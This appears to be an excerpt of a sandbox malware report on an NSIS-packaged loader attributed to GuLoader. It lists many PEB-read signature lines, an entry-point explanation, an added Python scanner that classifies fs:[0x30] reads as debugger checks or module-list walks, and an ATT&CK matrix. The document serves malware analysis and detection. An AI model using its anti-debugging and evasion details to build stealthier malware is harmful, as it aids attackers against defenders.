    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591F172 mov eax, dword ptr fs:[00000030h] 4_2_3591F172
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_35925096 mov eax, dword ptr fs:[00000030h] 4_2_35925096
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D090 mov eax, dword ptr fs:[00000030h] 4_2_3594D090
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3594D090 mov eax, dword ptr fs:[00000030h] 4_2_3594D090
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3595909C mov eax, dword ptr fs:[00000030h] 4_2_3595909C
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AD080 mov eax, dword ptr fs:[00000030h] 4_2_359AD080
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359AD080 mov eax, dword ptr fs:[00000030h] 4_2_359AD080
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_3591D08D mov eax, dword ptr fs:[00000030h] 4_2_3591D08D
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359F50D9 mov eax, dword ptr fs:[00000030h] 4_2_359F50D9
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359490DB mov eax, dword ptr fs:[00000030h] 4_2_359490DB
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h] 4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h] 4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h] 4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exe Code function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h] 4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov ecx, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359370C0 mov eax, dword ptr fs:[00000030h]4_2_359370C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D0C0 mov eax, dword ptr fs:[00000030h]4_2_3599D0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D0C0 mov eax, dword ptr fs:[00000030h]4_2_3599D0C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359450E4 mov eax, dword ptr fs:[00000030h]4_2_359450E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359450E4 mov ecx, dword ptr fs:[00000030h]4_2_359450E4
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E903E mov eax, dword ptr fs:[00000030h]4_2_359E903E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C705E mov ebx, dword ptr fs:[00000030h]4_2_359C705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C705E mov eax, dword ptr fs:[00000030h]4_2_359C705E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B052 mov eax, dword ptr fs:[00000030h]4_2_3594B052
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov ecx, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35931070 mov eax, dword ptr fs:[00000030h]4_2_35931070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3599D070 mov ecx, dword ptr fs:[00000030h]4_2_3599D070
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A106E mov eax, dword ptr fs:[00000030h]4_2_359A106E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5060 mov eax, dword ptr fs:[00000030h]4_2_359F5060
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F539D mov eax, dword ptr fs:[00000030h]4_2_359F539D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597739A mov eax, dword ptr fs:[00000030h]4_2_3597739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3597739A mov eax, dword ptr fs:[00000030h]4_2_3597739A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C13B9 mov eax, dword ptr fs:[00000030h]4_2_359C13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C13B9 mov eax, dword ptr fs:[00000030h]4_2_359C13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C13B9 mov eax, dword ptr fs:[00000030h]4_2_359C13B9
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359433A5 mov eax, dword ptr fs:[00000030h]4_2_359433A5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359533A0 mov eax, dword ptr fs:[00000030h]4_2_359533A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359533A0 mov eax, dword ptr fs:[00000030h]4_2_359533A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB3D0 mov ecx, dword ptr fs:[00000030h]4_2_359DB3D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F53FC mov eax, dword ptr fs:[00000030h]4_2_359F53FC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF3E6 mov eax, dword ptr fs:[00000030h]4_2_359DF3E6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A930B mov eax, dword ptr fs:[00000030h]4_2_359A930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A930B mov eax, dword ptr fs:[00000030h]4_2_359A930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A930B mov eax, dword ptr fs:[00000030h]4_2_359A930B
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35917330 mov eax, dword ptr fs:[00000030h]4_2_35917330
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E132D mov eax, dword ptr fs:[00000030h]4_2_359E132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E132D mov eax, dword ptr fs:[00000030h]4_2_359E132D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F32A mov eax, dword ptr fs:[00000030h]4_2_3594F32A
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919353 mov eax, dword ptr fs:[00000030h]4_2_35919353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919353 mov eax, dword ptr fs:[00000030h]4_2_35919353
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D34C mov eax, dword ptr fs:[00000030h]4_2_3591D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591D34C mov eax, dword ptr fs:[00000030h]4_2_3591D34C
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5341 mov eax, dword ptr fs:[00000030h]4_2_359F5341
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927370 mov eax, dword ptr fs:[00000030h]4_2_35927370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927370 mov eax, dword ptr fs:[00000030h]4_2_35927370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35927370 mov eax, dword ptr fs:[00000030h]4_2_35927370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359C3370 mov eax, dword ptr fs:[00000030h]4_2_359C3370
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF367 mov eax, dword ptr fs:[00000030h]4_2_359DF367
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595329E mov eax, dword ptr fs:[00000030h]4_2_3595329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595329E mov eax, dword ptr fs:[00000030h]4_2_3595329E
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5283 mov eax, dword ptr fs:[00000030h]4_2_359F5283
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov eax, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov eax, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov ecx, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359A92BC mov ecx, dword ptr fs:[00000030h]4_2_359A92BC
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359352A0 mov eax, dword ptr fs:[00000030h]4_2_359352A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359E92A6 mov eax, dword ptr fs:[00000030h]4_2_359E92A6
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B72A0 mov eax, dword ptr fs:[00000030h]4_2_359B72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359B72A0 mov eax, dword ptr fs:[00000030h]4_2_359B72A0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B2D3 mov eax, dword ptr fs:[00000030h]4_2_3591B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B2D3 mov eax, dword ptr fs:[00000030h]4_2_3591B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3591B2D3 mov eax, dword ptr fs:[00000030h]4_2_3591B2D3
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F2D0 mov eax, dword ptr fs:[00000030h]4_2_3594F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594F2D0 mov eax, dword ptr fs:[00000030h]4_2_3594F2D0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3594B2C0 mov eax, dword ptr fs:[00000030h]4_2_3594B2C0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359292C5 mov eax, dword ptr fs:[00000030h]4_2_359292C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359292C5 mov eax, dword ptr fs:[00000030h]4_2_359292C5
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DF2F8 mov eax, dword ptr fs:[00000030h]4_2_359DF2F8
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB2F0 mov eax, dword ptr fs:[00000030h]4_2_359CB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359CB2F0 mov eax, dword ptr fs:[00000030h]4_2_359CB2F0
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359192FF mov eax, dword ptr fs:[00000030h]4_2_359192FF
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359D12ED mov eax, dword ptr fs:[00000030h]4_2_359D12ED
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F52E2 mov eax, dword ptr fs:[00000030h]4_2_359F52E2
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35957208 mov eax, dword ptr fs:[00000030h]4_2_35957208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35957208 mov eax, dword ptr fs:[00000030h]4_2_35957208
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359F5227 mov eax, dword ptr fs:[00000030h]4_2_359F5227
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB256 mov eax, dword ptr fs:[00000030h]4_2_359DB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_359DB256 mov eax, dword ptr fs:[00000030h]4_2_359DB256
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919240 mov eax, dword ptr fs:[00000030h]4_2_35919240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35919240 mov eax, dword ptr fs:[00000030h]4_2_35919240
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_3595724D mov eax, dword ptr fs:[00000030h]4_2_3595724D
    Source: C:\Users\user\Desktop\450707124374000811.exeCode function: 4_2_35949274 mov eax, dword ptr fs:[00000030h]4_2_35949274
Source: C:\Users\user\Desktop\450707124374000811.exe; Code function: 0_2_00403373 EntryPoint, SetErrorMode, GetVersion, lstrlenA, #17, OleInitialize, SHGetFileInfoW, GetCommandLineW, GetModuleHandleW, CharNextW, GetTempPathW, GetTempPathW, GetWindowsDirectoryW, lstrcatW, GetTempPathW, lstrcatW, SetEnvironmentVariableW, SetEnvironmentVariableW, SetEnvironmentVariableW, DeleteFileW, OleUninitialize, ExitProcess, lstrcatW, lstrcatW, lstrcatW, lstrcmpiW, SetCurrentDirectoryW, DeleteFileW, CopyFileW, CloseHandle, GetCurrentProcess, OpenProcessToken, LookupPrivilegeValueW, AdjustTokenPrivileges, ExitWindowsEx, ExitProcess
This is the entry point of a stock NSIS installer stub (the sample also carries the http://nsis.sf.net/NSIS_Error string and drops System.dll, the NSIS System plugin, into C:\Users\user\AppData\Local\Temp\nsqA869.tmp), and the OpenProcessToken / LookupPrivilegeValueW / AdjustTokenPrivileges / ExitWindowsEx tail is the stub's reboot-on-finish path. The shutdown/reboot signature therefore describes the packaging rather than GuLoader-specific behaviour; the loader logic is the PEB-reading code at 4_2_359xxxxx listed above, whose addresses lie far outside the installer image that contains this entry point.
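The PEB-read signature lines above only say that a function executes mov <reg>, dword ptr fs:[00000030h]. What matters to an analyst is which PEB field is consumed right afterwards: BeingDebugged (+0x02) and NtGlobalFlag (+0x68) are debugger checks, Ldr (+0x0C) is the start of the module-list walk loaders use to resolve APIs without an import table. The following scanner is an added example for this page, not code from the Joe Sandbox report or from GuLoader; it finds the raw encodings of those reads in a 32-bit code blob and classifies them by the follow-up dereference. SAMPLE is constructed here, not bytes taken from the analysed binary, and the 0x3591F000 base used for display is arbitrary.

```python
"""Byte-level detector for the fs:[0x30] PEB reads that the signature lines above list.

Added example for this page; it is not code from the Joe Sandbox report or from
GuLoader. It shows what "mov eax, dword ptr fs:[00000030h]" looks like in raw
32-bit code and why a sandbox flags it: the PEB pointer sits at TEB+0x30, and the
field read right after it (BeingDebugged, NtGlobalFlag, Ldr) separates a debugger
check from an import-resolution walk. SAMPLE is constructed, not dumped.
"""
import re
from collections import Counter

# Register names indexed by the 3-bit ModRM reg/rm field value.
REG32 = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]

# Offsets inside the 32-bit PEB that anti-analysis and API-resolution code reads.
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x68: "NtGlobalFlag"}

# 0x64 = FS segment override, then either
#   A1 disp32            mov eax, fs:[disp32]      (short form, eax only)
#   8B <modrm> disp32    mov r32, fs:[disp32]      (modrm mod=00 rm=101 => disp32)
# followed by disp32 == 0x00000030.
PEB_READ = re.compile(
    rb"\x64(?:\xA1|\x8B(?P<modrm>[\x05\x0D\x15\x1D\x25\x2D\x35\x3D]))\x30\x00\x00\x00"
)


def find_peb_reads(code, base=0):
    """Return [(address, register)] for every fs:[0x30] read in `code`."""
    hits = []
    for m in PEB_READ.finditer(code):
        modrm = m.group("modrm")
        reg = "eax" if modrm is None else REG32[(modrm[0] >> 3) & 7]
        hits.append((base + m.start(), reg))
    return hits


def classify_peb_read(code, offset, reg, window=16):
    """Name the PEB field consumed by the first instruction after the read at
    `offset` that dereferences `reg` with a one-byte displacement; None if no
    recognisable dereference follows within `window` bytes."""
    r = REG32.index(reg)
    read_len = 6 if code[offset + 1] == 0xA1 else 7
    tail = code[offset + read_len: offset + read_len + window]
    for i in range(len(tail) - 3):
        b = tail[i:i + 4]
        # 8B /r, mod=01 rm=r, disp8        : mov r32, [reg+disp8]
        if b[0] == 0x8B and (b[1] & 0xC7) == (0x40 | r) and b[2] in PEB_FIELDS:
            return PEB_FIELDS[b[2]]
        # 0F B6 /r, mod=01 rm=r, disp8     : movzx r32, byte ptr [reg+disp8]
        if b[0] == 0x0F and b[1] == 0xB6 and (b[2] & 0xC7) == (0x40 | r) and b[3] in PEB_FIELDS:
            return PEB_FIELDS[b[3]]
        # 80 /7, mod=01 rm=r, disp8, imm8  : cmp byte ptr [reg+disp8], imm8
        if b[0] == 0x80 and b[1] == (0x78 | r) and b[2] in PEB_FIELDS:
            return PEB_FIELDS[b[2]]
    return None


def summarize(code, base=0):
    """Count PEB reads by the field they feed, the way a signature summary would."""
    return Counter(classify_peb_read(code, addr - base, reg) or "unknown"
                   for addr, reg in find_peb_reads(code, base))


# Constructed test bytes (not from the analysed binary): three PEB reads with the
# follow-up dereferences loader shellcode typically uses, plus one TEB read
# (fs:[0x18]) that must not match.
SAMPLE = (
    b"\x64\xA1\x30\x00\x00\x00"        # mov  eax, fs:[30h]
    b"\x0F\xB6\x40\x02"                # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    b"\x85\xC0\x75\x10"                # test eax, eax ; jnz +0x10
    b"\x90\x90\x90\x90"                # nop x4
    b"\x64\x8B\x0D\x30\x00\x00\x00"    # mov  ecx, fs:[30h]
    b"\x8B\x41\x0C"                    # mov  eax, [ecx+0Ch]           ; PEB.Ldr (API resolution)
    b"\x64\x8B\x1D\x30\x00\x00\x00"    # mov  ebx, fs:[30h]
    b"\x8B\x43\x68"                    # mov  eax, [ebx+68h]           ; PEB.NtGlobalFlag
    b"\x64\xA1\x18\x00\x00\x00"        # mov  eax, fs:[18h]            ; TEB self pointer, not PEB
)

if __name__ == "__main__":
    base = 0x3591F000  # arbitrary display address, chosen to resemble the report's region
    for addr, reg in find_peb_reads(SAMPLE, base):
        print(f"{addr:08X} mov {reg}, dword ptr fs:[00000030h] -> "
              f"{classify_peb_read(SAMPLE, addr - base, reg) or 'unknown'}")
    print(dict(summarize(SAMPLE, base)))
```

Run it over a dumped code region (for example the memory the 4_2_359xxxxx functions were carved from) to turn a flat count of PEB reads into "how many debugger checks, how many Ldr walks". The classifier only recognises the three common follow-up encodings with an 8-bit displacement; code that moves the PEB pointer through another register or uses a 32-bit displacement lands in "unknown" and needs a real disassembler.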
MITRE ATT&CK matrix (one line per tactic, cells in the report's row order; a number in front of a technique is the report's count for that cell, cells without a number are unmatched placeholders):
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 1 Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 1 Access Token Manipulation; 1 Process Injection; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 11 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 1 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 211 Security Software Discovery; 11 Virtualization/Sandbox Evasion; 2 File and Directory Discovery; 23 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Archive Collected Data; 1 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 3 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
